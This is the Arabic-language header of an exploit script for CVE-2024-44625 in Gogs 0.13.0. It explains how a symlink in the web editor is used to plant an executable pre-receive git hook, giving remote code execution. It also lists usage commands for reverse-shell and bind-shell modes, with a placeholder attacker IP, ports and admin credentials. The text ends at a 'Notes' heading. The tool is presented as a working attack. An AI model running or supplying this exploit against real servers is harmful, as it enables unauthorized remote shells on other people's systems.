
استغلال لثغرة CVE-2024-44625 في Gogs 0.13.0، يحقق تنفيذًا عن بُعد للكود عبر تتبّع الروابط الرمزية لإنشاء خطاف git، مع وضعي قشرة عكسية وقشرة مرتبطة.
تم التحقق من صحته ضد إصدار Gogs من حقبة 0.13.0 خلف وكيل عكسي.
البدائية: متابعة الرمزية في محرر الويب إلى ملف .git/hooks/pre-receive غير الموجود
ينشئ هذا الملف (قابل للتنفيذ). كل عملية دفع لاحقة إلى المستودع تقوم بتشغيله.
الاستخدام:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
ملاحظات: